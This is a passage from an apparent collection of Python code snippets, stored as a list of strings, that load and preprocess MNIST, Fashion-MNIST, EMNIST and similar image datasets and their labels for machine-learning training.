So we need '>I'\n\t# Get metadata for images\n\timages.read(4) # skip the magic_number\n\tnumber_of_images = images.read(4)\n\tnumber_of_images = unpack('>I', number_of_images)[0]\n\trows = images.read(4)\n\trows = unpack('>I', rows)[0]\n\tcols = images.read(4)\n\tcols = unpack('>I', cols)[0]\n\n\t# Get metadata for labels\n\tlabels.read(4) # skip the magic_number\n\tN = labels.read(4)\n\tN = unpack('>I', N)[0]\n\n\tif number_of_images != N:\n\t\traise Exception('number of labels did not match the number of images')\n\t# Get the data\n\tx = zeros((N, rows, cols), dtype=float32) # Initialize numpy array\n\ty = zeros((N, 1), dtype=uint8) # Initialize numpy array\n\tfor i in range(N):\n\t\tif i % 1000 == 0:\n\t\t\tprint(\"i: %i\" % i)\n\t\tfor row in range(rows):\n\t\t\tfor col in range(cols):\n\t\t\t\ttmp_pixel = images.read(1) # Just a single byte\n\t\t\t\ttmp_pixel = unpack('>B', tmp_pixel)[0]\n\t\t\t\tx[i][row][col] = tmp_pixel\n\t\ttmp_label = labels.read(1)\n\t\ty[i] = unpack('>B', tmp_label)[0]\n\treturn x, y", "def load_mnsit_training_set():\n try:\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n train_data = np.asarray(x_train, dtype=np.float32)\n eval_data = np.asarray(x_test, dtype=np.float32)\n train_labels = np.asarray(y_train, dtype=np.int32)\n eval_labels = np.asarray(y_test, dtype=np.int32)\n return train_data, eval_data, train_labels, eval_labels\n\n except Exception as error:\n raise EnvironmentError(\"load_mnsit_training_set: Exception loading MNSIT data: {0}\".format(error))", "def _load_mnist(path, dataset=\"training\", digits=None, asbytes=False,\n selection=None, return_labels=True, return_indices=False):\n\n # The files are assumed to have these names and should be found in 'path'\n files = {\n 'training': ('train-images-idx3-ubyte', 'train-labels-idx1-ubyte'),\n 'testing': ('t10k-images-idx3-ubyte', 't10k-labels-idx1-ubyte'),\n }\n\n try:\n images_fname = os.path.join(path, files[dataset][0])\n labels_fname = os.path.join(path, files[dataset][1])\n except KeyError:\n raise ValueError(\"Data set must be 'testing' or 'training'\")\n\n # We can skip the labels file only if digits aren't specified and labels\n # aren't asked for\n if return_labels or digits is not None:\n flbl = open(labels_fname, 'rb')\n magic_nr, size = struct.unpack(\">II\", flbl.read(8))\n labels_raw = pyarray(\"b\", flbl.read())\n flbl.close()\n\n fimg = open(images_fname, 'rb')\n magic_nr, size, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n images_raw = pyarray(\"B\", fimg.read())\n fimg.close()\n\n if digits:\n indices = [k for k in range(size) if labels_raw[k] in digits]\n else:\n indices = range(size)\n\n if selection:\n indices = indices[selection]\n\n images = np.zeros((len(indices), rows, cols), dtype=np.uint8)\n\n if return_labels:\n labels = np.zeros((len(indices)), dtype=np.int8)\n for i in range(len(indices)):\n images[i] = np.array(images_raw[indices[i] * rows * cols:(indices[i] + 1) * rows * cols]).reshape((rows, cols))\n if return_labels:\n labels[i] = labels_raw[indices[i]]\n\n if not asbytes:\n images = images.astype(float)/255.0\n\n ret = (images,)\n if return_labels:\n ret += (labels,)\n if return_indices:\n ret += (indices,)\n\n if len(ret) == 1:\n return ret[0] # Don't return a tuple of one\n\n return ret", "def extract_images(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2051:\n raise ValueError(\n 'Invalid magic number %d in MNIST image file: %s' %\n (magic, filename))\n 
num_images = _read32(bytestream)\n rows = _read32(bytestream)\n cols = _read32(bytestream)\n buf = bytestream.read(rows * cols * num_images)\n data = np.frombuffer(buf, dtype=np.uint8)\n data = data.reshape(num_images, rows, cols, 1)\n return data", "def read_mnist_labels(filename):\n with gzip.open(filename, 'rb') as f:\n magic, _ = struct.unpack('>ii', f.read(8))\n if magic != MNIST_LABEL_MAGIC:\n raise ValueError(\"Wrong magic number reading MNIST label file\")\n array = numpy.frombuffer(f.read(), dtype='uint8')\n array = array.reshape(array.size, 1)\n return array", "def load_dataset():\n temp = gzip.open('mnist.pkl.gz')\n train, val , test = pickle.load(temp,encoding='latin1')\n temp.close()\n train_inp = [np.reshape(x, (784,1)) for x in train[0]]\n train_outp = [one_hot(y) for y in train[1]]\n training_data = zip(train_inp, train_outp)\n validation_inp = [np.reshape(x, (784, 1)) for x in val[0]]\n validation_data = zip(validation_inp, val[1])\n test_inp = [np.reshape(x, (784, 1)) for x in test[0]]\n test_data = zip(test_inp, test[1])\n return (training_data,validation_data,test_data)", "def read_gz(images,labels):\n\t# Open the images with gzip in read binary mode\n\t# images = gzip.open('../MNIST-data/train-images-idx3-ubyte.gz', 'rb')\n\t# labels = gzip.open('../MNIST-data/train-labels-idx1-ubyte.gz', 'rb')\n\n\t# Read the binary data\n\n\t# We have to get big endian unsigned int. So we need '>I'\n\n\t# Get metadata for images\n\timages.read(4) # skip the magic_number\n\tnumber_of_images = images.read(4)\n\tnumber_of_images = unpack('>I', number_of_images)[0]\n\trows = images.read(4)\n\trows = unpack('>I', rows)[0]#28\n\tcols = images.read(4)\n\tcols = unpack('>I', cols)[0]#28\n\n\t# Get metadata for labels\n\tlabels.read(4) # skip the magic_number\n\tN = labels.read(4)\n\tN = unpack('>I', N)[0] #60000\n\t# print(number_of_images);\n\n\tif number_of_images != N:\n\t raise Exception('number of labels did not match the number of images')\n\n\t# Get the data\n\tx = zeros((N, rows, cols), dtype=float32) # Initialize numpy array #60000X28X28\n\ty = zeros((N, 1), dtype=uint8) # Initialize numpy array\n\tfor i in range(N):\n\t if i % 1000 == 0:\n\t print(\"i: %i\" % i)\n\t for row in range(rows):\n\t for col in range(cols):\n\t tmp_pixel = images.read(1) # Just a single byte\n\t tmp_pixel = unpack('>B', tmp_pixel)[0]\n\t x[i][row][col] = tmp_pixel\n\t tmp_label = labels.read(1)\n\t y[i] = unpack('>B', tmp_label)[0]\n\t # print(y.shape)#60000X1\n\treturn (x, y)", "def load_mnist(path, kind = 'train'):\n label_path = os.path.join(path, '%s-labels-idx1-ubyte' % kind)\n images_path = os.path.join(path, '%s-images-idx3-ubyte' % kind)\n\n\n with open(label_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II', lbpath.read(8))\n\n labels = np.fromfile(lbpath, dtype= np.uint8)\n\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack('>IIII', imgpath.read(16))\n\n images = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels),784)\n\n\n return images, labels", "def load_mnist_dataset(shape=(-1,784)):\n # We first define a download function, supporting both Python 2 and 3.\n if sys.version_info[0] == 2:\n from urllib import urlretrieve\n else:\n from urllib.request import urlretrieve\n\n def download(filename, source='http://yann.lecun.com/exdb/mnist/'):\n print(\"Downloading %s\" % filename)\n urlretrieve(source + filename, filename)\n\n # We then define functions for loading MNIST images and labels.\n # For convenience, they also download the requested files if 
needed.\n import gzip\n\n def load_mnist_images(filename):\n if not os.path.exists(filename):\n download(filename)\n # Read the inputs in Yann LeCun's binary format.\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=16)\n # The inputs are vectors now, we reshape them to monochrome 2D images,\n # following the shape convention: (examples, channels, rows, columns)\n data = data.reshape(shape)\n # data = data.reshape(-1, 1, 28, 28) # for lasagne\n # data = data.reshape(-1, 28, 28, 1) # for tensorflow\n # data = data.reshape(-1, 784) # for tensorflow\n # The inputs come as bytes, we convert them to float32 in range [0,1].\n # (Actually to range [0, 255/256], for compatibility to the version\n # provided at http://deeplearning.net/data/mnist/mnist.pkl.gz.)\n return data / np.float32(256)\n\n def load_mnist_labels(filename):\n if not os.path.exists(filename):\n download(filename)\n # Read the labels in Yann LeCun's binary format.\n with gzip.open(filename, 'rb') as f:\n data = np.frombuffer(f.read(), np.uint8, offset=8)\n # The labels are vectors of integers now, that's exactly what we want.\n return data\n\n # We can now download and read the training and test set images and labels.\n ## you may want to change the path\n data_dir = '' #os.getcwd() + '/lasagne_tutorial/'\n # print('data_dir > %s' % data_dir)\n\n X_train = load_mnist_images(data_dir+'train-images-idx3-ubyte.gz')\n y_train = load_mnist_labels(data_dir+'train-labels-idx1-ubyte.gz')\n X_test = load_mnist_images(data_dir+'t10k-images-idx3-ubyte.gz')\n y_test = load_mnist_labels(data_dir+'t10k-labels-idx1-ubyte.gz')\n\n # We reserve the last 10000 training examples for validation.\n X_train, X_val = X_train[:-10000], X_train[-10000:]\n y_train, y_val = y_train[:-10000], y_train[-10000:]\n\n ## you may want to plot one example\n # print('X_train[0][0] >', X_train[0][0].shape, type(X_train[0][0])) # for lasagne\n # print('X_train[0] >', X_train[0].shape, type(X_train[0])) # for tensorflow\n # # exit()\n # # [[..],[..]] (28, 28) numpy.ndarray\n # # plt.imshow 只支持 (28, 28)格式,不支持 (1, 28, 28),所以用 [0][0]\n # fig = plt.figure()\n # #plotwindow = fig.add_subplot(111)\n # # plt.imshow(X_train[0][0], cmap='gray') # for lasagne (-1, 1, 28, 28)\n # plt.imshow(X_train[0].reshape(28,28), cmap='gray') # for tensorflow (-1, 28, 28, 1)\n # plt.title('A training image')\n # plt.show()\n\n # We just return all the arrays in order, as expected in main().\n # (It doesn't matter how we do this as long as we can read them again.)\n return X_train, y_train, X_val, y_val, X_test, y_test", "def read_mnist_images(filename, dtype=None):\n with gzip.open(filename, 'rb') as f:\n magic, number, rows, cols = struct.unpack('>iiii', f.read(16))\n if magic != MNIST_IMAGE_MAGIC:\n raise ValueError(\"Wrong magic number reading MNIST image file\")\n array = numpy.frombuffer(f.read(), dtype='uint8')\n array = array.reshape((number, 1, rows, cols))\n if dtype:\n dtype = numpy.dtype(dtype)\n\n if dtype.kind == 'b':\n # If the user wants Booleans, threshold at half the range.\n array = array >= 128\n elif dtype.kind == 'f':\n # Otherwise, just convert.\n array = array.astype(dtype)\n array /= 255.\n else:\n raise ValueError(\"Unknown dtype to convert MNIST to\")\n return array", "def get_data():\n\t(X_train, y_train), (X_val, y_val) = mnist.load_data()\n\tn_features = X_train.shape[1]*X_train.shape[1]\n\tn_train = X_train.shape[0]\n\tn_val = X_val.shape[0]\n\tX_train = X_train.reshape(n_train, n_features)\n\tX_val = X_val.reshape(n_val, 
n_features)\n\tX_train = X_train.astype(\"float32\") / 255\n\tX_val = X_val.astype(\"float32\") / 255\n\n\treturn (X_train, y_train), (X_val, y_val)", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,'{}-labels-idx1-ubyte'.format(kind))\n images_path = os.path.join(path,'{}-images-idx3-ubyte'.format(kind))\n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8).reshape(n)\n\n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack('>IIII',\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape((num,1,rows,cols))\n print(kind)\n print(\"label num:\",n)\n print(\"image num:\",num)\n print(\"image rows:\",rows)\n print(\"image cols:\",cols)\n images = images/255\n return images, labels", "def fetch_multimnist_image(label):\n dataset = MultiMNIST('./data', train=False, download=True,\n transform=transforms.ToTensor(),\n target_transform=charlist_tensor)\n images = dataset.test_data\n labels = dataset.test_labels\n n_rows = len(images)\n\n images = []\n for i in xrange(n_rows):\n image = images[i]\n text = labels[i]\n if tensor_to_string(text.squeeze(0)) == label:\n images.append(image)\n\n if len(images) == 0:\n sys.exit('No images with label (%s) found.' % label)\n\n images = torch.cat(images).cpu().numpy()\n ix = np.random.choice(np.arange(images.shape[0]))\n image = images[ix]\n image = torch.from_numpy(image).float() \n image = image.unsqueeze(0)\n return Variable(image, volatile=True)", "def read_data_sets_label(data_dir, label):\n train_data, test_data = read_data_sets(data_dir, one_hot=False)\n train_mask = create_mask(train_data, label)\n test_mask = create_mask(test_data, label)\n return (train_data.images[train_mask], test_data.images[test_mask])", "def get_mnist():\n from keras.datasets import mnist\n\n # input image dimensions\n img_rows, img_cols = 28, 28\n num_classes = 10\n # the data, shuffled and split between train and test sets\n (x_train, y_train), (x_test, y_test) = mnist.load_data()\n\n if K.image_data_format() == 'channels_first':\n print (\"Using Channels first\")\n x_train = x_train.reshape(x_train.shape[0], 1, img_rows, img_cols)\n x_test = x_test.reshape(x_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\n else:\n print(\"Channels last\")\n x_train = x_train.reshape(x_train.shape[0], img_rows, img_cols, 1)\n x_test = x_test.reshape(x_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\n return (x_train, y_train), (x_test, y_test)", "def load_data():\n f = gzip.open('mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = pickle.load(f, encoding=\"latin1\")\n f.close()\n \n X_train = [np.reshape(x, (784, 1)) for x in training_data[0]]\n Y_train = [vectorized_result(y) for y in training_data[1]]\n \n X_validation = [np.reshape(x, (784, 1)) for x in validation_data[0]]\n Y_validation = validation_data[1]\n \n X_test = [np.reshape(x, (784, 1)) for x in test_data[0]]\n Y_test = test_data[1]\n \n return (X_train, Y_train, X_validation, Y_validation, X_test, Y_test)", "def extract_labels(filename, num_images):\n filepath = os.path.join(WORK_DIRECTORY, filename)\n print('Extracting', filepath)\n with open(filepath, mode='rb') as bytestream:\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_mnist_data(batch=128):\n \n def transformer(data, label):\n data = 
data.flatten().expand_dims(0).astype(np.float32)/255\n data = data-0.13/0.31\n label = label.astype(np.float32)\n return data, label\n\n train_dataset = gluon.data.vision.datasets.MNIST(root=M5_IMAGES, train=True, transform=transformer)\n validation_dataset = gluon.data.vision.datasets.MNIST(root=M5_IMAGES, train=False, transform=transformer)\n train_dataloader = gluon.data.DataLoader(train_dataset, batch_size=batch, last_batch='keep',shuffle=True)\n validation_dataloader = gluon.data.DataLoader(validation_dataset, batch_size=batch, last_batch='keep')\n \n return train_dataloader, validation_dataloader", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte' % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte' % kind)\n \n with open(labels_path, 'rb') as lbpath:\n magic, n = struct.unpack('>II',\n lbpath.read(8))\n labels = np.fromfile(lbpath,\n dtype=np.uint8)\n \n with open(images_path, 'rb') as imgpath:\n magic, num, rows, cols = struct.unpack(\">IIII\",\n imgpath.read(16))\n images = np.fromfile(imgpath,\n dtype=np.uint8).reshape(len(labels), 784)\n \n return images, labels", "def load_data_mnist(train_size=None):\n print \"---->\\n.....Loading MNIST data from the skdata package\"\n dataset = view.OfficialImageClassification()\n if train_size:\n train_data = {}\n validation_data = {}\n order = permutation(dataset.all_images.shape[0])\n train_data['images'] = dataset.all_images[order[:train_size]] / 256.\n train_data['labels'] = dataset.all_labels[order[:train_size]]\n validation_data['images'] = (dataset.all_images[order[train_size:]]\n / 256.)\n validation_data['labels'] = dataset.all_labels[order[train_size:]]\n else:\n train_data = {}\n validation_data = {}\n train_data['images'] = dataset.all_images / 256.\n train_data['labels'] = dataset.all_labels\n for r in train_data:\n train_data[r] = train_data[r].astype(theano.config.floatX)\n for r in validation_data:\n validation_data[r] = validation_data[r].astype(theano.config.floatX)\n print \"---->\\n.....Done!\"\n\n return train_data, validation_data", "def read_training_pixels(image_path, label_path):\n\n if io_function.is_file_exist(image_path) is False or io_function.is_file_exist(label_path) is False:\n return False\n\n # check: they are from the same polygons\n polygon_index_img = os.path.basename(image_path).split('_')[-3]\n polygon_index_label = os.path.basename(label_path).split('_')[-3]\n if polygon_index_img != polygon_index_label:\n raise ValueError(\"%s and %s are not from the same training polygons\" % (image_path, label_path))\n\n with rasterio.open(image_path) as img_obj:\n # read the all bands\n indexes = img_obj.indexes\n nbands = len(indexes)\n img_data = img_obj.read(indexes)\n\n with rasterio.open(label_path) as img_obj:\n # read the all bands (only have one band)\n indexes = img_obj.indexes\n if len(indexes) != 1:\n raise ValueError('error, the label should only have one band')\n\n label_data = img_obj.read(indexes)\n\n # check the size\n # print(img_data.shape)\n # print(label_data.shape)\n if img_data.shape[1] != label_data.shape[1] or img_data.shape[2] != label_data.shape[2]:\n raise ValueError('the image and label have different size')\n\n X_arr = img_data.reshape(nbands, -1)\n y_arr = label_data.reshape(-1)\n\n basic.outputlogMessage(str(X_arr.shape))\n basic.outputlogMessage(str(y_arr.shape))\n # sys.exit(1)\n\n return X_arr, y_arr", "def load_data():\n dirname = os.path.join('datasets', 'fashion-mnist')\n base = 
'http://fashion-mnist.s3-website.eu-central-1.amazonaws.com/'\n files = [\n 'train-labels-idx1-ubyte.gz', 'train-images-idx3-ubyte.gz',\n 't10k-labels-idx1-ubyte.gz', 't10k-images-idx3-ubyte.gz'\n ]\n\n paths = []\n for fname in files:\n paths.append(get_file(fname, origin=base + fname, cache_subdir=dirname))\n\n with gzip.open(paths[0], 'rb') as lbpath:\n y_train = np.frombuffer(lbpath.read(), np.uint8, offset=8)\n\n with gzip.open(paths[1], 'rb') as imgpath:\n x_train = np.frombuffer(\n imgpath.read(), np.uint8, offset=16).reshape(len(y_train), 28, 28)\n\n with gzip.open(paths[2], 'rb') as lbpath:\n y_test = np.frombuffer(lbpath.read(), np.uint8, offset=8)\n\n with gzip.open(paths[3], 'rb') as imgpath:\n x_test = np.frombuffer(\n imgpath.read(), np.uint8, offset=16).reshape(len(y_test), 28, 28)\n\n return (x_train, y_train), (x_test, y_test)", "def load_data():\n # Load image data from MNIST.\n (train_x, train_y),(eval_x, eval_y) = keras.datasets.mnist.load_data()\n\n # We convert the input data to (60000, 28, 28, 1), float32 and normalize our data values to the range [0, 1].\n train_x = train_x.reshape(train_x.shape[0], train_x.shape[1], train_x.shape[2], 1)\n eval_x = eval_x.reshape(eval_x.shape[0], eval_x.shape[1], eval_x.shape[2], 1)\n\n train_x = train_x.astype('float32')\n eval_x = eval_x.astype('float32')\n train_x /= 255\n eval_x /= 255\n\n # Preprocess class labels \n train_y = train_y.astype(np.int32)\n eval_y = eval_y.astype(np.int32)\n\n train_y = np_utils.to_categorical(train_y, 10)\n eval_y = np_utils.to_categorical(eval_y, 10)\n\n return train_x, train_y, eval_x, eval_y", "def extract_labels(filename):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n magic = _read32(bytestream)\n if magic != 2049:\n raise ValueError(\n 'Invalid magic number %d in MNIST label file: %s' %\n (magic, filename))\n num_items = _read32(bytestream)\n buf = bytestream.read(num_items)\n labels = np.frombuffer(buf, dtype=np.uint8)\n return dense_to_one_hot(labels)", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def get_images(image_folder_root, image_label_list):\n file_dcm=[]\n X = []\n y = []\n for file_name,label in image_label_list:\n try:\n current_file = pydicom.dcmread(image_folder_root + file_name + '.dcm')\n pixel_array = current_file.pixel_array\n if (pixel_array.shape != (512,512)):\n continue\n file_dcm.append((file_name,label,brain_window(current_file)))\n y.append(label)\n X.append(pydicom.dcmread(image_folder_root + file_name + '.dcm').pixel_array)\n except ValueError:\n continue\n return X,y", "def get_images(image_folder_root, image_label_list):\n file_dcm=[]\n X_test = []\n y_test = []\n for file_name,label in image_label_list:\n try:\n current_file = pydicom.dcmread(image_folder_root + file_name + '.dcm')\n pixel_array = current_file.pixel_array\n if (pixel_array.shape != (512,512)):\n continue\n file_dcm.append((file_name,label,brain_window(current_file)))\n y_test.append(label)\n X_test.append(pydicom.dcmread(image_folder_root + file_name + '.dcm').pixel_array)\n except 
ValueError:\n continue\n return X_test,y_test", "def load_data():\n prefix = 'mnist_data/'\n train_data = np.load(prefix + 'mnist_train_images.npy')\n train_labels = np.load(prefix + 'mnist_train_labels.npy')\n val_data = np.load(prefix + 'mnist_validation_images.npy')\n val_labels = np.load(prefix + 'mnist_validation_labels.npy')\n test_data = np.load(prefix + 'mnist_test_images.npy')\n test_labels = np.load(prefix + 'mnist_test_labels.npy')\n assert train_data.shape == (55000, 784) and train_labels.shape == (55000, 10)\n assert val_data.shape == (5000, 784) and val_labels.shape == (5000, 10)\n assert test_data.shape == (10000, 784) and test_labels.shape == (10000, 10)\n return train_data, train_labels, val_data, val_labels, test_data, test_labels", "def mnist(path=None):\r\n url = 'http://yann.lecun.com/exdb/mnist/'\r\n files = ['train-images-idx3-ubyte.gz',\r\n 'train-labels-idx1-ubyte.gz',\r\n 't10k-images-idx3-ubyte.gz',\r\n 't10k-labels-idx1-ubyte.gz']\r\n\r\n if path is None:\r\n # Set path to /home/USER/data/mnist or C:\\Users\\USER\\data\\mnist\r\n path = os.path.join(os.path.expanduser('~'), 'data', 'mnist')\r\n\r\n # Create path if it doesn't exist\r\n os.makedirs(path, exist_ok=True)\r\n\r\n # Download any missing files\r\n for file in files:\r\n if file not in os.listdir(path):\r\n urlretrieve(url + file, os.path.join(path, file))\r\n print(\"Downloaded %s to %s\" % (file, path))\r\n\r\n def _images(path):\r\n \"\"\"Return images loaded locally.\"\"\"\r\n with gzip.open(path) as f:\r\n # First 16 bytes are magic_number, n_imgs, n_rows, n_cols\r\n pixels = np.frombuffer(f.read(), 'B', offset=16)\r\n return pixels.reshape(-1, 784).astype('float32') / 255\r\n\r\n def _labels(path):\r\n \"\"\"Return labels loaded locally.\"\"\"\r\n with gzip.open(path) as f:\r\n # First 8 bytes are magic_number, n_labels\r\n integer_labels = np.frombuffer(f.read(), 'B', offset=8)\r\n\r\n def _onehot(integer_labels):\r\n \"\"\"Return matrix whose rows are onehot encodings of integers.\"\"\"\r\n n_rows = len(integer_labels)\r\n n_cols = integer_labels.max() + 1\r\n onehot = np.zeros((n_rows, n_cols), dtype='uint8')\r\n onehot[np.arange(n_rows), integer_labels] = 1\r\n return onehot\r\n\r\n return _onehot(integer_labels)\r\n\r\n train_images = _images(os.path.join(path, files[0]))\r\n train_labels = _labels(os.path.join(path, files[1]))\r\n test_images = _images(os.path.join(path, files[2]))\r\n test_labels = _labels(os.path.join(path, files[3]))\r\n\r\n return train_images, train_labels, test_images, test_labels", "def read(dataset = \"training\", path = \".\"):\n\n if dataset is \"training\":\n fname_img = os.path.join(path, 'train-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels.idx1-ubyte')\n elif dataset is \"testing\":\n fname_img = os.path.join(path, 't10k-images.idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels.idx1-ubyte')\n else:\n raise ValueError(\"dataset must be 'testing' or 'training'\")\n\n # Load everything in some numpy arrays\n with open(fname_lbl, 'rb') as flbl:\n magic, num = struct.unpack(\">II\", flbl.read(8))\n lbl = np.fromfile(flbl, dtype=np.int8)\n\n with open(fname_img, 'rb') as fimg:\n magic, num, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)\n\n get_img = lambda idx: (lbl[idx], img[idx])\n\n # Create an iterator which returns each image in turn\n for i in range(len(lbl)):\n yield get_img(i)", "def load_data():\n\n training_files_dir = \"digits/trainingDigits\"\n 
training_files = os.listdir(training_files_dir)\n file_num = len(training_files)\n hw_labels = []\n\n training_mat = zeros((file_num, 32 * 32))\n for i in xrange(file_num):\n filename = training_files[i]\n file_label = int((filename.split(\".\")[0]).split(\"_\")[0])\n hw_labels.append(file_label)\n training_mat[i, :] = img2vector(training_files_dir + '/' + filename)\n\n return training_mat, hw_labels", "def load_mnist(path, kind='train'):\n\tlabels_path = os.path.join(path,'%s-labels.idx1-ubyte'%kind)\n\timages_path = os.path.join(path,'%s-images.idx3-ubyte'%kind)\n\t\n\twith open(labels_path, 'rb') as lbpath:\n\t\tmagic, n = struct.unpack('>II', lbpath.read(8))\n\t\tlabels = np.fromfile(lbpath, dtype=np.uint8)\n\t\t\n\twith open(images_path, 'rb') as imgpath:\n\t\tmagic, num, row, cols = struct.unpack('>IIII', imgpath.read(16))\n\t\timages = np.fromfile(imgpath, dtype=np.uint8).reshape(len(labels), 784)\n\t\n\treturn images, labels", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n return labels", "def extract_labels(filename, num_images):\n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = numpy.frombuffer(buf, dtype=numpy.uint8).astype(numpy.int64)\n return labels", "def load_data(self) -> tuple:\n label_num = {}\n data_set = pathlib.Path(self.path)\n data = []\n\n # create the label lookup dict for verifcation later\n for i, v in enumerate(data_set.iterdir()):\n label_num[v.name] = i\n self.labels[i] = v.name\n # end\n\n # read images\n for img_path in data_set.rglob(\"*.jpg\"):\n lbl = label_num[str(img_path.parent.stem)]\n img = cv2.imread(str(img_path))\n img = cv2.resize(img, self.dims, interpolation=cv2.INTER_AREA)\n\n # flatten RGB data into a vector\n # NOTE: NOT ACTUALLY NECESSARY! \n img.flatten()\n\n # label the sample and append to temp data list\n sample = np.append(lbl, img)\n data.append(sample)\n # end\n\n # partition and package the data (*_ ensures safe unpacking)\n train, test, validate, *_ = Data.partition(data, self.parts, 0.7, 0.2)\n self.train = Data(train)\n self.test = Data(test)\n self.validate = Data(validate)", "def load_EMNIST_data(file, verbose = False, standarized = False): \n mat = sio.loadmat(file)\n data = mat[\"dataset\"]\n \n X_train = data['train'][0,0]['images'][0,0]\n X_train = X_train.reshape((X_train.shape[0], 28, 28), order = \"F\")\n y_train = data['train'][0,0]['labels'][0,0]\n y_train = np.squeeze(y_train)\n y_train -= 1 #y_train is zero-based\n \n X_test = data['test'][0,0]['images'][0,0]\n X_test= X_test.reshape((X_test.shape[0], 28, 28), order = \"F\")\n y_test = data['test'][0,0]['labels'][0,0]\n y_test = np.squeeze(y_test)\n y_test -= 1 #y_test is zero-based\n \n if standarized: \n X_train = X_train/255\n X_test = X_test/255\n mean_image = np.mean(X_train, axis=0)\n X_train -= mean_image\n X_test -= mean_image\n \n\n if verbose == True: \n print(\"EMNIST-letter dataset ... 
\")\n print(\"X_train shape :\", X_train.shape)\n print(\"X_test shape :\", X_test.shape)\n print(\"y_train shape :\", y_train.shape)\n print(\"y_test shape :\", y_test.shape)\n \n return X_train, y_train, X_test, y_test", "def _load_images_and_labels(image_dir):\n\n print('Extracting images from: ', image_dir)\n\n image_paths = _load_image_paths(image_dir)\n images = _extract_images(image_paths)\n num_images = len(image_paths)\n labels = np.ones(num_images, dtype=np.int64)\n\n return images, labels", "def readData():\n\tN = 800\n\tD = 28*28\n\tX = np.zeros((N, D), dtype=np.uint8)\n\n\tf = open(\"data/a012_images.dat\", 'rb')\n\n\tfor i in range(0, N):\n\t\tX[i, :] = np.fromstring(f.read(D), dtype='uint8')\n\n\tf.close()\n\n\treturn X", "def extract_labels(filename, num_images):\n\n# this function definition has been taken from internet \n print('Extracting', filename)\n with gzip.open(filename) as bytestream:\n bytestream.read(8)\n buf = bytestream.read(1 * num_images)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64) #Interpret a buffer as a 1-dimensional array\n return labels", "def load_mnist(path, kind='train'):\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte.gz'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte.gz'\n % kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\n return images, labels", "def load_mnist(path, kind='train'):\n\n labels_path = os.path.join(path,\n '%s-labels-idx1-ubyte.gz'\n % kind)\n images_path = os.path.join(path,\n '%s-images-idx3-ubyte.gz'\n % kind)\n\n with gzip.open(labels_path, 'rb') as lbpath:\n labels = np.frombuffer(lbpath.read(), dtype=np.uint8,\n offset=8)\n\n with gzip.open(images_path, 'rb') as imgpath:\n images = np.frombuffer(imgpath.read(), dtype=np.uint8,\n offset=16).reshape(len(labels), 784)\n\n return images, labels", "def load_data(filename):\n emnist = loadmat(filename)\n\n # Load training images and labels\n train_images_unshuffled = emnist['train_images']\n train_labels_unshuffled = emnist['train_labels']\n\n # Combine labels and training data\n combined_training = np.hstack((train_images_unshuffled, train_labels_unshuffled))\n\n # Shuffle data\n np.random.shuffle(combined_training)\n\n # Seperate into data and labels\n # Split into training and validation sets\n train_images = combined_training[:20800,:-1] / 255 # Normalize data, values are now between 0 and 1\n train_labels = combined_training[:20800,-1][...,None] # Turns back into column vector\n validation_images = combined_training[20800:,:-1] / 255 # Normalize data, values are now between 0 and 1\n validation_labels = combined_training[20800:,-1][...,None] # Turns back into column vector\n\n # Load training images and labels\n test_images = emnist['test_images'] / 255 # Normalize data, values are now between 0 and 1\n test_labels = emnist['test_labels']\n\n return train_images, train_labels, test_images, test_labels, validation_images, validation_labels", "def load_test_data():\n X = []\n y = []\n for fname in os.listdir(test_dir):\n label = int(fname.split(\"_\")[0])\n img = plt.imread(os.path.join(test_dir, fname))\n X.append(img)\n y.append(label)\n X = np.stack(X)\n y = np.stack(y)\n return X, y", "def load_labeled_data():\n\n images = []\n labels = []\n\n for i in range(1, 10):\n path = (\"selflabeled\", str(i), 
